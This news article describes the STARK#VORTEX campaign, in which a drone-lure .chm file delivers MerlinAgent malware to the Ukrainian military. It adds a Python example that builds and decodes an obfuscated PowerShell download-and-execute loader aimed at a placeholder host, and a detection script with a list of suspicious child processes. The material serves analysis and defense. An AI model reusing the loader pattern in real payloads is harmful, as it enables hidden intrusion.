Hackers Use Drone Manual Lures to Deliver the Notorious MerlinAgent Malware
Securonix Threat Research has discovered a significant attack campaign, tracked as STARK#VORTEX, which appears to originate from a group known as UAC-0154.
The campaign specifically targets Ukraine's military, relying on a cunning tactic built around drone-related lures.
Drones have played a pivotal role in Ukraine's military operations, which makes them an attractive theme for malicious actors.
The attackers behind UAC-0154 previously used military-themed documents sent by email to Ukrainian targets on @ukr.net addresses.
Their tactics have evolved, however, and they have now turned to delivering the MerlinAgent malware using a new method.
Here is a breakdown of the attack chain:
Lure File – The malicious file is disguised as a Microsoft Help file, commonly known as a .chm file. Specifically, it was titled “Інфо про навчання по БПЛА для військових.v2.2.chm,” which translates to “Info about UAV training for the military.”
When the user opens this file, it triggers malicious JavaScript code embedded inside it.
Obfuscated PowerShell – The JavaScript code inside the .chm file launches an obfuscated PowerShell script, which contacts a remote command-and-control (C2) server to download an obfuscated binary payload.
Payload Activation – Once decoded, this payload turns out to be a beacon for the MerlinAgent malware. It establishes communication with the C2 server and grants the attackers full control of the host.
The attack chain may appear simple, but the threat actors employed advanced techniques and obfuscation at every stage to avoid detection.
Initial Code Execution – Microsoft Help files, despite being an older format, can still be executed on modern Windows systems.
In this case, opening the .chm file caused the Help viewer (hh.exe) to launch a PowerShell process, which bypassed antivirus and EDR detections.
Help File and JavaScript Execution – The .chm file acted as a container. Analysis of its contents revealed obfuscated JavaScript code that in turn executed an obfuscated PowerShell script.
PowerShell Execution – The PowerShell code used multiple layers of obfuscation, including Base64 encoding, GZIP compression, and character substitution. Once unwrapped, it downloaded the payload from a specific URL, deobfuscated it, and saved it to disk.
Binary File Analysis – The downloaded binary, roughly 5MB in size, turned out to be a 64-bit executable built with the MerlinAgent framework, an open-source command-and-control (C2) framework available on GitHub.
The framework offers a range of capabilities, including encrypted C2 communication, remote command shells, module support, and more.
C2 and Infrastructure – The attackers established encrypted communication with their C2 servers over port 443, which blends in with ordinary HTTPS traffic and makes detection harder.
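The layering described above (Base64, GZIP, character substitution, then execution) is a common PowerShell loader pattern, and an analyst usually wants to peel it back to recover the inner script and its download URL. The following is an added example, not Securonix's tooling or the campaign's actual script: the loader string is constructed to mimic the pattern, the substitution map ('$' to '@', 'http' to 'hxxp') is assumed for illustration, and the URL in the inner stage is a placeholder, not a STARK#VORTEX indicator.

```python
"""Peel layered PowerShell obfuscation (Base64 -> GZIP -> character
substitution -> IEX).  Added example with a constructed sample loader."""
import base64
import gzip
import re

# Constructed inner stage an analyst wants to recover (placeholder URL).
INNER_STAGE = (
    "$u='https://example.invalid/stage2.bin';"
    "$d=(New-Object Net.WebClient).DownloadData($u)"
)


def build_sample() -> str:
    """Build a loader in the style of the campaign: substitute characters,
    GZIP, Base64, then wrap in a PowerShell one-liner that reverses it."""
    substituted = INNER_STAGE.replace("$", "@").replace("http", "hxxp")
    blob = base64.b64encode(gzip.compress(substituted.encode())).decode()
    return (
        "powershell -nop -w hidden -c \"$s=[IO.StreamReader]::new("
        "[IO.Compression.GzipStream]::new([IO.MemoryStream]::new("
        f"[Convert]::FromBase64String('{blob}')),"
        "[IO.Compression.CompressionMode]::Decompress)).ReadToEnd();"
        "IEX($s.Replace('@','$').Replace('hxxp','http'))\""
    )


B64_RE = re.compile(r"FromBase64String\('([A-Za-z0-9+/=]+)'\)")
REPLACE_RE = re.compile(r"\.Replace\('([^']*)','([^']*)'\)")
URL_RE = re.compile(r"https?://[^\s'\"()]+")
GZIP_MAGIC = b"\x1f\x8b"


def peel(cmdline: str):
    """Return (recovered script, list of layers removed, URLs found)."""
    layers = []
    match = B64_RE.search(cmdline)
    if match is None:
        raise ValueError("no FromBase64String blob in command line")
    data = base64.b64decode(match.group(1))
    layers.append("base64")
    if data.startswith(GZIP_MAGIC):  # gzip member header 1f 8b
        data = gzip.decompress(data)
        layers.append("gzip")
    text = data.decode("utf-8", errors="replace")
    # The loader's own .Replace() chain is the substitution map; apply it in
    # the same order PowerShell would.
    for old, new in REPLACE_RE.findall(cmdline):
        text = text.replace(old, new)
        layers.append(f"replace {old!r}->{new!r}")
    return text, layers, URL_RE.findall(text)


if __name__ == "__main__":
    script, layers, urls = peel(build_sample())
    print("layers:", " -> ".join(layers))
    print("script:", script)
    print("urls:", urls)
```

The decoder deliberately reads the substitution map out of the loader rather than hard-coding it, because the map changes from sample to sample while the `.Replace()` chain that undoes it has to be present in clear text for the script to run.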
This highly targeted campaign focused on the Ukrainian military. The use of file types that can easily slip past defenses, combined with the attackers' clever framing, underscores the need for vigilance.
Securonix recommends several mitigations, including avoiding downloads from untrusted sources, monitoring commonly abused directories for suspicious activity, and deploying enhanced logging for better detection coverage.
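The most reliable signal in this chain is the process lineage: the Help viewer (hh.exe) should never spawn a script interpreter, and the 443 connection that follows is only meaningful once tied to that child. The following detection logic is an added example, not Securonix's rule set, run over constructed Sysmon-style ProcessCreate (EventID 1) and NetworkConnect (EventID 3) events; the GUIDs, IP addresses and paths are placeholders, not campaign indicators. It generalises slightly beyond the article: any interpreter in SUSPICIOUS_CHILDREN is flagged, not only powershell.exe.

```python
"""Flag hh.exe spawning a script interpreter and enrich the alert with the
.chm command line and the child's outbound connections.
Added example over constructed Sysmon-style events."""
import ntpath

SUSPICIOUS_CHILDREN = {
    "powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe",
    "wscript.exe", "cscript.exe", "rundll32.exe", "regsvr32.exe",
}

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
HH = r"C:\Windows\hh.exe"

# Constructed events (field names follow Sysmon's schema; values are placeholders).
SAMPLE_EVENTS = [
    {"EventID": 1, "ProcessGuid": "{A1}", "Image": HH,
     "CommandLine": r'"C:\Windows\hh.exe" C:\Users\Public\Downloads\Інфо про навчання по БПЛА для військових.v2.2.chm',
     "ParentImage": r"C:\Windows\explorer.exe", "ParentProcessGuid": "{E1}"},
    {"EventID": 1, "ProcessGuid": "{P1}", "Image": PS,
     "CommandLine": "powershell -nop -w hidden -c ...",
     "ParentImage": HH, "ParentProcessGuid": "{A1}"},
    {"EventID": 3, "ProcessGuid": "{P1}", "Image": PS,
     "DestinationIp": "203.0.113.10", "DestinationPort": 443},
    # Benign control: service-launched PowerShell that also talks on 443.
    {"EventID": 1, "ProcessGuid": "{P2}", "Image": PS,
     "CommandLine": r"powershell -File C:\scripts\backup.ps1",
     "ParentImage": r"C:\Windows\System32\svchost.exe", "ParentProcessGuid": "{S1}"},
    {"EventID": 3, "ProcessGuid": "{P2}", "Image": PS,
     "DestinationIp": "198.51.100.5", "DestinationPort": 443},
]


def basename(path):
    # ntpath handles Windows separators regardless of the analysis host.
    return ntpath.basename(path).lower()


def detect_chm_spawns(events):
    """Return one alert per interpreter whose parent process is hh.exe."""
    creates = {e["ProcessGuid"]: e for e in events if e["EventID"] == 1}
    connects = {}
    for e in events:
        if e["EventID"] == 3:
            connects.setdefault(e["ProcessGuid"], []).append(
                (e["DestinationIp"], e["DestinationPort"]))
    alerts = []
    for e in creates.values():
        if basename(e["ParentImage"]) != "hh.exe":
            continue
        if basename(e["Image"]) not in SUSPICIOUS_CHILDREN:
            continue
        parent = creates.get(e["ParentProcessGuid"], {})
        alerts.append({
            "child": e["ProcessGuid"],
            "child_cmdline": e["CommandLine"],
            "chm_cmdline": parent.get("CommandLine"),   # which .chm was opened
            "connections": connects.get(e["ProcessGuid"], []),
        })
    return alerts


if __name__ == "__main__":
    for alert in detect_chm_spawns(SAMPLE_EVENTS):
        print(alert)
```

The benign svchost.exe-launched PowerShell with its own 443 connection is included to show why the port alone is not the detection: without the parent-child match it never produces an alert, while the hh.exe child is flagged even before any network activity is seen.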
Source credit : cybersecuritynews.com